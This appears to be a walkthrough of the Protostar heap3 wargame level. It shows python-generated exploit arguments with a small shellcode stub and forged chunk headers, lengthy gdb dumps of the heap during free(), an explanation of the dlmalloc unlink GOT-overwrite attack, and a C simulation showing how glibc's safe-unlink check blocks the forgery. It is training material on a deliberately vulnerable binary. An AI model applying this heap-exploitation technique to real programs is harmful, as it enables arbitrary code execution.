run AAAAAAAAAA `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96+"\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08"'`

The main problem is that when free runs, the chunks end up getting tangled with each other.

Let's try again with this one.

A quick note here on getting the winner function to execute.

Push it onto the top of the stack and then ret, and it will execute.

push 0x8048864
ret

Online Disassembler

https://defuse.ca/online-x86-assembler.htm#disassembly

"\x68\x64\x88\x04\x08\xC3"

Let's try this.

`python -c 'print "AAAAAAAA\x68\x64\x88\x04\x08\xc3 " + "B"*32 + "\xfc\xff\xff\xff"*2 + " CCCC\x1c\xb1\x04\x08\x04\xc0\x04\x08"'`

Still getting an error. Please debug it yourself; it's getting too long, so I won't show those parts.

The main point is that at the moment -4 is subtracted, the value sitting there as data being 0x42 bytes is what causes the problem. If you want the subtraction to have no effect at all, fill it with 0xff bytes and it will work out.

Look at the result below. If you go through it step by step you'll get it.

(gdb) r `python -c 'print "AAAAAAAA\x68\x64\x88\x04\x08\xc3 " + "\xff"*32 + "\xfc\xff\xff\xff"*2 + " CCCC\x1c\xb1\x04\x08\x04\xc0\x04\x08"'`

Starting program: /opt/protostar/bin/heap3 `python -c 'print "AAAAAAAA\x68\x64\x88\x04\x08\xc3 " + "\xff"*32 + "\xfc\xff\xff\xff"*2 + " CCCC\x1c\xb1\x04\x08\x04\xc0\x04\x08"'`
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c050:      0xfffffffc      0xfffffffc      0x43434343      0x0804b11c
0x804c060:      0x0804c004      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    0x18(%esp),%eax
0xbffffc50:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xd      13

Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffffd24) at heap3/heap3.c:24
24      heap3/heap3.c: No such file or directory.
        in heap3/heap3.c
(gdb) ni
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048916 <main+141>:   mov    0x18(%esp),%eax
0x804891a <main+145>:   mov    %eax,(%esp)
0xbffffc50:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x20000  131072
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xf88    3976
25      in heap3/heap3.c
(gdb) ni
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804891a <main+145>:   mov    %eax,(%esp)
0x804891d <main+148>:   call   0x8049824 <free>
0xbffffc50:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c030        134529072
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xf88    3976
0x0804891a      25      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804891d <main+148>:   call   0x8049824 <free>
0x8048922 <main+153>:   mov    0x14(%esp),%eax
0xbffffc50:     0x0804c030      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c030        134529072
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xf88    3976
0x0804891d      25      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048922 <main+153>:   mov    0x14(%esp),%eax
0x8048926 <main+157>:   mov    %eax,(%esp)
0xbffffc50:     0x0804c030      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804b170        134525296
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c028        134529064
26      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048926 <main+157>:   mov    %eax,(%esp)
0x8048929 <main+160>:   call   0x8049824 <free>
0xbffffc50:     0x0804c030      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c008        134529032
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c028        134529064
0x08048926      26      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048929 <main+160>:   call   0x8049824 <free>
0x804892e <main+165>:   movl   $0x804ac27,(%esp)
0xbffffc50:     0x0804c008      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c008        134529032
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c028        134529064
0x08048929      26      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x0804c028      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804892e <main+165>:   movl   $0x804ac27,(%esp)
0x8048935 <main+172>:   call   0x8048790 <puts@plt>
0xbffffc50:     0x0804c008      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804b170        134525296
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c000        134529024
28      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x0804c028      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048935 <main+172>:   call   0x8048790 <puts@plt>
0x804893a <main+177>:   leave
0xbffffc50:     0x0804ac27      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804b170        134525296
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c000        134529024
0x08048935      28      in heap3/heap3.c
(gdb)
that wasn't too bad now, was it? @ 1523508788
0x804c000:      0x00000000      0x00000029      0x0804c028      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804893a <main+177>:   leave
0x804893b <main+178>:   ret
0xbffffc50:     0x0804ac27      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x2e     46
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xb7fd9340       -1208118464
29      in heap3/heap3.c
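
What the trace above records, read back against the dumps: the words written over b's data and c's header (0xffffffff ... 0xfffffff8 at 0x804c04c, 0xfffffffc at 0x804c050 and 0x804c054) give c a size that is far too large for a fastbin and has PREV_INUSE clear, so free(c) takes the backward-consolidation path, computes the "previous chunk" from the forged prev_size and calls unlink() on it. unlink's two pointer writes are what redirect the puts GOT entry into the heap: the bytes 68 64 88 04 08 c3 sitting at 0x804c010 in every dump decode to push 0x8048864 ; ret, so when main+172 calls puts@plt the program lands in chunk a and prints winner's message. Two details worth noticing in the dumps: the stub is placed 8 bytes into a, not at its start, because free(a) later overwrites the first word of a's data (0x804c008 goes from 0x41414141 to the fastbin link 0x0804c028 between the dumps at main+160 and main+165), and one of unlink's writes also lands inside the heap, so the stub has to sit where neither write touches it.

The C below is an added example, not code from this post or from LiveOverflow. It models that unlink in a simulated 32-bit little-endian memory so that fd/bk sit at +8/+12 exactly as in the i386 binary, reuses the chunk addresses and the forged prev_size/size values from the trace, and then runs the same forged chunk through the "corrupted double-linked list" check that later glibc added. The GOT slot address (0x804b100), the fd/bk values stored in the fake chunk and the zeroed "before" memory are constructed for the demo and are not the heap3 binary's own.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated 32-bit, little-endian memory covering the addresses in the trace
 * (0x804b000..0x804c100), so the pointer offsets are the i386 ones: fd = +8, bk = +12. */
#define SIM_BASE 0x0804b000u
#define SIM_SIZE 0x1100u
static uint8_t sim[SIM_SIZE];

static uint8_t *at(uint32_t addr)
{
    assert(addr >= SIM_BASE && addr <= SIM_BASE + SIM_SIZE - 4);
    return sim + (addr - SIM_BASE);
}
static uint32_t rd32(uint32_t addr)
{
    const uint8_t *p = at(addr);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void wr32(uint32_t addr, uint32_t v)
{
    uint8_t *p = at(addr);
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Chunk addresses as in the trace; GOT_PUTS is a hypothetical slot chosen for this demo. */
#define CHUNK_A   0x0804c000u
#define CHUNK_C   0x0804c050u
#define STUB_ADDR 0x0804c010u
#define GOT_PUTS  0x0804b100u

/* _int_free consolidating backward: p = chunk_at_offset(p, -prev_size).  With the
 * trace's prev_size of 0xfffffffc (-4) the "previous chunk" lies 4 bytes *after* c. */
static uint32_t consolidate_backward(uint32_t chunk, uint32_t prev_size)
{
    return chunk - prev_size;          /* wraps mod 2^32, like the i386 binary */
}

/* Old dlmalloc unlink(): two unchecked pointer writes. */
static void unlink_old(uint32_t p)
{
    uint32_t fd = rd32(p + 8), bk = rd32(p + 12);
    wr32(fd + 12, bk);                 /* FD->bk = BK */
    wr32(bk + 8, fd);                  /* BK->fd = FD */
}

/* Hardened unlink: glibc's "corrupted double-linked list" check before the writes. */
static int unlink_safe(uint32_t p)
{
    uint32_t fd = rd32(p + 8), bk = rd32(p + 12);
    if (rd32(fd + 12) != p || rd32(bk + 8) != p)
        return -1;
    wr32(fd + 12, bk);
    wr32(bk + 8, fd);
    return 0;
}

/* Constructed heap state after the three strcpy()s: the forged c header from the trace,
 * the stub words from 0x804c010, and demo-chosen fd/bk inside the fake chunk. */
static void lay_out_forged_heap(void)
{
    memset(sim, 0, sizeof sim);
    wr32(STUB_ADDR, 0x04886468u);          /* 68 64 88 04 08 c3 = push 0x8048864 ; ret, */
    wr32(STUB_ADDR + 4, 0x0000c308u);      /* split over two little-endian words         */
    wr32(CHUNK_C, 0xfffffffcu);            /* c->prev_size = -4 */
    wr32(CHUNK_C + 4, 0xfffffffcu);        /* c->size = -4: PREV_INUSE clear, not a fastbin size */
    uint32_t fake = consolidate_backward(CHUNK_C, rd32(CHUNK_C));   /* 0x804c054 */
    wr32(fake + 8, GOT_PUTS - 12);         /* fd: FD->bk is exactly the GOT slot */
    wr32(fake + 12, CHUNK_A);              /* bk: the value the GOT slot receives */
}

/* free(c) through the old unlink; returns where puts@plt jumps afterwards. */
static uint32_t exploit_old_unlink(void)
{
    lay_out_forged_heap();
    unlink_old(consolidate_backward(CHUNK_C, rd32(CHUNK_C)));
    return rd32(GOT_PUTS);                 /* CHUNK_A */
}

/* Same layout through the hardened unlink: rejected, nothing written. */
static int exploit_safe_unlink(void)
{
    lay_out_forged_heap();
    return unlink_safe(consolidate_backward(CHUNK_C, rd32(CHUNK_C)));
}

/* The second unlink write lands at BK+8 = 0x804c008; the stub 8 bytes further on survives. */
static int stub_intact(void)
{
    return rd32(STUB_ADDR) == 0x04886468u && (rd32(STUB_ADDR + 4) & 0xffffu) == 0xc308u;
}

int main(void)
{
    uint32_t target = exploit_old_unlink();
    printf("old unlink : GOT[puts] = 0x%08x, a+8 = 0x%08x, stub intact = %d\n",
           (unsigned)target, (unsigned)rd32(CHUNK_A + 8), stub_intact());
    printf("safe unlink: rc = %d, GOT[puts] = 0x%08x\n",
           exploit_safe_unlink(), (unsigned)rd32(GOT_PUTS));
    return 0;
}
```

Build with `gcc -std=c99 -Wall unlink_demo.c -o unlink_demo`. The old-unlink run shows the GOT slot now holding 0x0804c000 and 0x804c008 clobbered with the fd value, while the stub words at 0x804c010 are untouched; the hardened run returns -1 because neither FD->bk nor BK->fd points back at the fake chunk, which is why this exact forgery stopped working once allocators started checking the list before unlinking.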

Thanks

😀

Ref : liveoverflow